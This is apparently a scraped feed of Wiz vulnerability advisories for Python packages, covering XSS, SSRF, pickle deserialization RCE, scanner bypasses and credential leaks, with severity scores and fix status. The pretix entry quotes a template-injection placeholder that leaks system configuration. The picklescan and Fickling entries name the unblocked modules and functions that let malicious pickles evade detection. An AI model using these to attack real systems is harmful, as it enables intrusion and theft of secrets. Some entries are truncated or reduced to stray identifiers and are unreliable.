Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-27026 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27026 [MEDIUM] CVE-2026-27026 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27026 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires a malformed /FlateDecode stream, where the byte-by-byte decompression is used. This vulnerability is fixed in 6.7.1.
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Feb 21, 2026
Debian 11, 12, 13 Se
Wiz
CVE-2026-27839 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27839 [MEDIUM] CVE-2026-27839 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27839 :
Python vulnerability analysis and mitigation
nutritional_values
Model.objects.get(pk=pk)
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
Wiz
The CVE Database: Curated Vulnerability Intelligence from Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] The CVE Database: Curated Vulnerability Intelligence from Wiz | Wiz
## Wiz vulnerability database
A comprehensive resource for tracking high-profile vulnerabilities in cloud environments, tailored to security teams and cloud professionals
See how Wiz detects exploitable vulnerabilities in cloud workloads. Watch the 12-minute demo
## Explore by technology
## Popular filters
## High profile
| CVE ID | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Published date |
|---|---|---|---|---|---|---|---|
| CVE-2026-35616 | CRITICAL | 9.8 | FortiClient EMS | cpe:2.3:a:fortinet:forticlient_enterprise_management_server | Yes | Yes | Apr 04, 2026 |
| GHSA-69fq-xp46-6x23 | CRITICAL | 9.4 | N/A | github.com/aquasecurity/trivy | No | Yes | Mar 24, 2026 |
| CVE-2026-3055 | CRITICAL | 9.3 | Citrix ADC VPX | cpe:2.3:a:citrix:netscaler_app | | | |
Wiz
CVE-2026-34046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-34046 [HIGH] CVE-2026-34046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34046 :
Python vulnerability analysis and mitigation
_read_flow
src/backend/base/langflow/api/v1/flows.py
AUTO_LOGIN
user_id
AUTO_LOGIN
False
user_id = NULL
AUTO_LOGIN
Source : NVD
## 8.7
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
LangFlow
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
langflow
langflow-base
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Wiz
CVE-2026-30928 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-30928 [HIGH] CVE-2026-30928 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30928 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, the /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords. This vulnerability is fixed in 4.5.1.
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 87.3
Exploita
Wiz
GHSA-g38g-8gr9-h9xp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-g38g-8gr9-h9xp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-g38g-8gr9-h9xp :
Python vulnerability analysis and mitigation
## Summary
picklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.
## Severity
Critical (CVSS 9.8) — Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.
## Affected Versions
picklescan <= 1.0.3 (all versions including latest)
## Details
## Unblocked RCE Modules
uuid
_get_command_stdout(cmd, *args)
subprocess.Popen((cmd,) + args)
CLEAN
_osx_support
_read_output(cmdstring)
os.system(
Wiz
CVE-2026-34203 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-34203 [LOW] CVE-2026-34203 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34203 :
Python vulnerability analysis and mitigation
Nautobot is a Network Source of Truth and Network Automation Platform. Prior to versions 2.4.30 and 3.0.10, user creation and editing via the REST API fails to apply the password validation rules defined by Django's AUTH_PASSWORD_VALIDATORS setting (which defaults to an empty list, i.e., no specific rules, but can be configured in Nautobot's nautobot_config.py to apply various rules if desired). This can potentially allow for the creation or modification of users to have passwords that are weak or otherwise do not comply with configured standards. This issue has been patched in versions 2.4.30 and 3.0.10.
Source : NVD
## 2.7
Score
Published March 31, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Ha
Wiz
CVE-2026-28802 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-28802 [HIGH] CVE-2026-28802 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28802 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, a malicious JWT containing `alg: none` and an empty signature passed the signature verification step without any changes to the application code, where a failure was expected. This issue has been patched in version 1.6.7.
Source : NVD
## 7.7
Score
Published March 6, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-authlib
Wiz
CVE-2025-67492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67492 [MEDIUM] CVE-2025-67492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67492 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15, it was possible to trigger repository updates for many repositories via a crafted webhook payload. Version 5.15 fixes the issue. As a workaround, disabling webhooks completely using ENABLE_HOOKS avoids this vulnerability.
Source : NVD
## 5.3
Score
Published December 16, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 16, 2025
Wiz
CVE-2026-21883 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2026-21883 [MEDIUM] CVE-2026-21883 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21883 :
Python vulnerability analysis and mitigation
Bokeh is an interactive visualization library written in Python. In versions 3.8.1 and below, if a server is configured with an allowlist (e.g., dashboard.corp), an attacker can register a domain like dashboard.corp.attacker.com (or use a subdomain if applicable) and lure a victim to visit it. The malicious site can then initiate a WebSocket connection to the vulnerable Bokeh server. Since the Origin header (e.g., http://dashboard.corp.attacker.com/ ) matches the allowlist according to the flawed logic, the connection is accepted. Once connected, the attacker can interact with the Bokeh server on behalf of the victim, potentially accessing sensitive data, or modifying visualizations. This issue is fixed in version 3.8.2.
S
Wiz
CVE-2026-32596 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32596 [HIGH] CVE-2026-32596 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32596 :
Python vulnerability analysis and mitigation
glances -w
Source : NVD
## 8.7
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 88.7
Exploitation Probability (EPSS) 4.2
Affected packages and libraries
glances
Sources
NVD
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 202
Wiz
CVE-2026-25480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-25480 [MEDIUM] CVE-2026-25480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25480 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, FileStore maps cache keys to filenames using Unicode NFKD normalization and ord() substitution without separators, creating key collisions. When FileStore is used as response-cache backend, an unauthenticated remote attacker can trigger cache key collisions via crafted paths, causing one URL to serve cached responses of another (cache poisoning/mixup). This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
Wiz
CVE-2026-25479 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-25479 [MEDIUM] CVE-2026-25479 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25479 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, in litestar.middleware.allowed_hosts, allowlist entries are compiled into regex patterns in a way that allows regex metacharacters to retain special meaning (e.g., . matches any character). This enables a bypass where an attacker supplies a host that matches the regex but is not the intended literal hostname. This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.6
Exploitation Probability
Wiz
CVE-2026-25735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25735 [MEDIUM] CVE-2026-25735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25735 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Affecte
Wiz
CVE-2026-3060 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3060 [CRITICAL] CVE-2026-3060 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3060 :
Python vulnerability analysis and mitigation
SGLang's encoder parallel disaggregation system is vulnerable to unauthenticated remote code execution through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication.
Source : NVD
## 9.8
Score
Published March 12, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
SGLang
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 70.7
Exploitation Probability (EPSS) 0.6
Affected packages and libraries
cpe:2.3:a:lmsys:sglang
sglang
Sources
pip Severity CRITICAL No Fix Added at: Mar 12, 2026
Linux Severity CRITICAL No Fix Added at: Apr 02, 2026
Windows Severity CRI
Wiz
CVE-2026-34936 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34936 [HIGH] CVE-2026-34936 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34936 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server. This issue has been patched in version 4.5.90.
Source : NVD
## 7.7
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2026-22608 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22608 [HIGH] CVE-2026-22608 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22608 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, both ctypes and pydoc modules aren't explicitly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fickling
Sources
Wiz
CVE-2026-28223 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28223 [MEDIUM] CVE-2026-28223 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28223 :
Python vulnerability analysis and mitigation
Wagtail is an open source content management system built on Django. Prior to versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1, a stored cross-site scripting (XSS) vulnerability exists on confirmation messages within the wagtail.contrib.simple_translation module. A user with access to the Wagtail admin area may create a page with a specially-crafted title which, when another user performs the "Translate" action, causes arbitrary JavaScript code to run. This could lead to performing actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. This issue has been patched in versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1.
Source : NVD
## 6.1
Score
Published M
Wiz
CVE-2026-34446 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-34446 [MEDIUM] CVE-2026-34446 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34446 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is an issue in onnx.load: the code checks for symlinks to prevent path traversal but completely misses hardlinks, because a hardlink looks exactly like a regular file on the filesystem. This issue has been patched in version 1.21.0.
Source : NVD
## 4.7
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
onnx
py3-onnx
Sources
NVD
C
Wiz
CVE-2026-24126 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-24126 [MEDIUM] CVE-2026-24126 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24126 :
Python vulnerability analysis and mitigation
ssh-add
Source : NVD
## 9.1
Score
Published February 19, 2026
Severity CRITICAL
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 18, 2026
## Related Python vulnerabilities:
| CVE ID | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Published date |
|---|---|---|---|---|---|---|---|
| CVE-2026-35615 | CRITICAL | 9.2 | | | | | |
Wiz
CVE-2026-32109 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-32109 [LOW] CVE-2026-32109 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32109 :
Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to 1.20.12, if an attacker has been given both read- and write-permissions to the server, they can upload a malicious file with the filename .prologue.html and then craft a link to potentially execute arbitrary JavaScript in the victim's context. Note that it is intended behavior that the JavaScript would execute if the target clicks a link to the HTML file itself; "https://example.com/foo/.prologue.html". The vulnerability is that "https://example.com/foo/?b" would also evaluate the file, making the behavior unexpected. There are existing preventative measures (strict SameSite cookies) which makes it harder to leverage this vulnerability in an attack; in order to gain control of t
Wiz
CVE-2025-69872 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-69872 [CRITICAL] CVE-2025-69872 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69872 :
Python vulnerability analysis and mitigation
DiskCache (python-diskcache) through 5.6.3 uses Python pickle for serialization by default. An attacker with write access to the cache directory can achieve arbitrary code execution when a victim application reads from the cache.
Source : NVD
## 9.8
Score
Published February 11, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
diskcache
python3-diskcache
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 12, 2026
Debian 14 Severity CRITICAL No Fix Ad
Wiz
CVE-2026-34172 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34172 [HIGH] CVE-2026-34172 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34172 :
Python vulnerability analysis and mitigation
Giskard is an open-source Python library for testing and evaluating agentic systems. Prior to versions 0.3.4 and 1.0.2b1, ChatWorkflow.chat(message) passes its string argument directly as a Jinja2 template source to a non-sandboxed Environment. A developer who passes user input to this method enables full remote code execution via Jinja2 class traversal. The method name chat and parameter name message naturally invite passing user input directly, but the string is silently parsed as a Jinja2 template, not treated as plain text. This issue has been patched in versions 0.3.4 and 1.0.2b1.
Source : NVD
## 7.7
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit Ye
Wiz
CVE-2026-25130 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-25130 [CRITICAL] CVE-2026-25130 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25130 :
Python vulnerability analysis and mitigation
subprocess.Popen()
shell=True
find_file()
Source : NVD
## 9.6
Score
Published January 30, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cai-framework
Sources
NVD
pip Severity CRITICAL No Fix Added at: Jan 31, 2026
Wiz
CVE-2026-25516 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25516 [MEDIUM] CVE-2026-25516 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25516 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. The ui.markdown() component uses the markdown2 library to convert markdown content to HTML, which is then rendered via innerHTML. By default, markdown2 allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through ui.markdown(), an attacker can inject malicious HTML containing JavaScript event handlers. Unlike other NiceGUI components that render HTML (ui.html(), ui.chat_message(), ui.interactive_image()), the ui.markdown() component does not provide or require a sanitize parameter, leaving applications vulnerable to XSS attacks. This vulnerability is fixed in 3.7.0.
Source : NVD
## 6.1
Score
Published February 6, 2026
Seve
Wiz
GHSA-cwxj-rr6w-m6w7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-cwxj-rr6w-m6w7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-cwxj-rr6w-m6w7 :
Python vulnerability analysis and mitigation
## Impact
Referrer-Policy
Referer
scrapy.spidermiddlewares.referer.DefaultReferrerPolicy
Referer
Referrer-Policy
sys.exit
## Patches
Upgrade to Scrapy 2.14.2 (or later).
## Workarounds
If you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.
Referer
REFERER_ENABLED
False
Referer
referrer_policy
referrer_policy
Referrer-Policy
```python
Request(
    url,
    meta={
        "referrer_policy": "scrapy.spidermiddlewares.referer.DefaultReferrerPolicy",
    },
)
```
Instead of editing requests individually, you can:
referrer_policy
Referrer-Policy
None
SPIDER_MIDDLEWARES
Source : NVD
## 7.5
Score
Published March 13, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
H
Wiz
CVE-2025-14881 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.8
CVE-2025-14881 [LOW] CVE-2025-14881 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14881 :
Python vulnerability analysis and mitigation
Multiple API endpoints allowed access to other users' sensitive files to anyone who knew the file's UUID, even though those files were not intended to be accessible by UUID alone.
Source : NVD
## 3.8
Score
Published December 19, 2025
Severity LOW
CNA Score 3.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pretix
Sources
NVD
pip Severity LOW Has Fix Added at: Dec 22, 2025
Wiz
CVE-2026-22219 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-22219 [HIGH] CVE-2026-22219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22219 :
Python vulnerability analysis and mitigation
Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider.
Source : NVD
## 8.3
Score
Published January 20, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit N
Wiz
CVE-2026-2415 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2415 [HIGH] CVE-2026-2415 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2415 :
Python vulnerability analysis and mitigation
Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when `{name}` is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs:

It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as `{{event.__init__.__code__.co_filename}}`. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due
Wiz
CVE-2026-32633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-32633 [CRITICAL] CVE-2026-32633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32633 :
Python vulnerability analysis and mitigation
/api/4/serverslist
GlancesServersList.get_servers_list()
uri
--password
/api/4/serverslist
Source : NVD
## 9.1
Score
Published March 18, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Echo Severity CRITICAL No Fix Added at: Mar 19, 2026
pip Severity CRITICAL Has Fix Added at: Mar 17, 2026
Homebrew Severity CRITICAL Has Fix Add
Wiz
CVE-2026-32108 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32108 [MEDIUM] CVE-2026-32108 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32108 :
Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to 1.20.12, there was a missing permission-check in the shares feature (the shr global-option). This vulnerability only applies when the shares feature is used for the specific purpose of creating a share of just a single file inside a folder or either the FTP or SFTP server is enabled, and also made publicly accessible. Given these conditions, when a user is browsing a share through either FTP or SFTP (not http or https), they can gain read-access to the remaining files inside the shared folder by guessing/bruteforcing the filenames. It was not possible to descend into subdirectories in this manner; only the sibling files were accessible. This vulnerability is similar to CVE-2025-
Wiz
CVE-2026-35463 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-35463 [HIGH] CVE-2026-35463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35463 :
Python vulnerability analysis and mitigation
## Summary
ADMIN_ONLY_OPTIONS
AntiVirus
avfile
subprocess.Popen()
## Details
ADMIN_ONLY_OPTIONS
```python
ADMIN_ONLY_OPTIONS = {
    "reconnect.script",  # Blocks script path change
    "webui.host",  # Blocks bind address change
    "ssl.cert_file",  # Blocks cert path change
    "ssl.key_file",  # Blocks key path change
    # ... other sensitive options
}
```
Where it IS enforced — core config (core/api/__init__.py:255):
```python
def set_config_value(self, section, option, value):
    if f"{section}.{option}" in ADMIN_ONLY_OPTIONS:
        if not self.user.is_admin:
            raise PermissionError("Admin only")
    # ...
```
Where it is NOT enforced — plugin config (core/api/__init__.py:271-272):
```python
# Plugin config - NO admin check at all
self.pyload.config.set_plugin(category, option, valu
```
Wiz
CVE-2026-25739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-25739 [MEDIUM] CVE-2026-25739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25739 :
Python vulnerability analysis and mitigation
STATIC_FILE_METHOD
xaccelredirect
Source : NVD
## 5.4
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
indico
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2
Wiz
CVE-2026-22609 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22609 [HIGH] CVE-2026-22609 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22609 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
